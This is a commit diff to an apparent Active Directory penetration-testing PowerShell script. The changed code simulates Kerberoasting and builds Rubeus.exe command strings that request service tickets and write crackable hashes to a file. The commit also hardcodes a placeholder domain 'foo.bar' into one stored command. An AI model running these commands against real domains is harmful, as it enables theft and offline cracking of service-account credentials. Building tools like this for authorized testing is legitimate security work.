better logging

rolling-code · rolling-code · commit f9ed7136a20b · 2026-05-21T10:32:33.000-04:00
diff --git a/Azure Active Directory/MSADPT/MSADPT_exploit_privesc_initial.ps1 b/Azure Active Directory/MSADPT/MSADPT_exploit_privesc_initial.ps1
@@ -252,7 +252,6 @@ if ($KerberoastInputFiles.Count -gt 0) {
                 # or a custom implementation of Kerberos protocol.
 
                 if (1){ #Prompt-User -PromptText "Simulating Kerberoast ticket request for ${SAM}. Do you want to try an actual request (requires Rubeus.exe or similar)? (N will just log the target)") {
-                    Write-MSADPTLog -Message "Simulated Kerberoast ticket request for ${SAM} on ${DC}. Actual command would be: Rubeus.exe kerberoast /user:${SAM} /domain:${DC.Split('.')[0]} /dc:${DC} /outfile:kerberoast_hashes.txt" -Level 'WARNING'
                     $KerberoastedHashes += [PSCustomObject]@{
                         Timestamp       = (Get-Date).ToString("yyyy-MM-dd HH:mm:ss")
                         AccountSam      = $SAM
@@ -261,10 +260,8 @@ if ($KerberoastInputFiles.Count -gt 0) {
                         HashType        = "Kerberoast (TGS-REQ)"
                         Status          = "Simulated Request / Ready for Rubeus"
                         MitreAttackID   = "T1558.003"
-                        #RawCommand      = "Rubeus.exe kerberoast /user:$SAM /domain:$DC.Split('.')[0] /dc:$DC /outfile:kerberoast_hashes.txt"
-						RawCommand      = "Rubeus.exe kerberoast /user:$SAM /domain:$($DC.Split('.')[0]) /dc:$DC /outfile:kerberoast_hashes.txt"
+						RawCommand      = "Rubeus.exe kerberoast /user:$SAM /domain:foo.bar /dc:$DC /outfile:kerberoast_hashes.txt"
                     }
-                    #Write-MSADPTLog -Message "    [POTENTIAL] Kerberoastable account: ${SAM} (${SPN}) on ${DC}. Requires external tool to exploit." -Level 'WARNING'
 					Write-MSADPTLog -Message "     [POTENTIAL] Kerberoastable account ${SAM} on ${DC}. Actual command would be: Rubeus.exe kerberoast /user:${SAM} /domain:$($DC.Split('.')[0]) /dc:${DC} /outfile:kerberoast_hashes.txt" -Level 'WARNING'
                 } else {
                      Write-MSADPTLog -Message "    Skipped actual Kerberoast ticket request for ${SAM}."
